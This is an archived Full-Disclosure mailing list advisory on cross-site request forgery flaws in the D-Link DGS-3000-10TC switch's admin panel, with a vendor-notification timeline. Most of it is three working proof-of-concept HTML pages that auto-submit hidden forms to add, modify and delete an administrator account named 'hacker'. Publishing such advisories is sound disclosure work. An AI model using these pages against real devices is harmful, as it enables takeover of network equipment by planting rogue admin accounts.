lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <005b01d3b0de$bb66c860$6700a8c0@pc>
Date: Wed, 28 Feb 2018 23:53:41 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] CSRF vulnerabilities in D-Link DGS-3000-10TC

Hello list!

There are Cross-Site Request Forgery vulnerabilities in D-Link 
DGS-3000-10TC. In previous advisory I wrote about Cross-Site Scripting and 
Content Spoofing vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DGS-3000-10TC, Firmware Version 
2.00.006. All other versions also must be vulnerable.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

Admin panel has CSRF vulnerabilities in all functionality. E.g. in this 
functionality.

Add new admin:

D-Link DGS-3000-10TC CSRF-1.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm" 
method="post">
<input type="hidden" name="h_flag" value="0">
<input type="hidden" name="T1" value="hacker">
<input type="hidden" name="T5" value="password">
<input type="hidden" name="operation" value="add">
<input type="hidden" name="S2" value="Admin">
<input type="hidden" name="T6" value="password">
</form>
</body>
</html>

Change password in new admin:

D-Link DGS-3000-10TC CSRF-2.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm" 
method="post">
<input type="hidden" name="username" value="hacker">
<input type="hidden" name="acc_right" value="Admin">
<input type="hidden" name="h_flag" value="0">
<input type="hidden" name="operation" value="modify">
<input type="hidden" name="password" value="password">
<input type="hidden" name="new_password" value="password1">
<input type="hidden" name="confirm_password" value="password1">
</form>
</body>
</html>

Delete new admin:

D-Link DGS-3000-10TC CSRF-3.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm" 
method="post">
<input type="hidden" name="T1" value="hacker">
<input type="hidden" name="operation" value="del">
</form>
</body>
</html>

------------
Timeline:
------------

2014-2018 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
2017.08.28 - informed about it one USA company with bug bounty program -
they were interested in this device, but not in these vulnerabilities. Later
informed D-Link about them.
2017.10.28 - disclosed at my site (http://websecurity.com.ua/8720/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists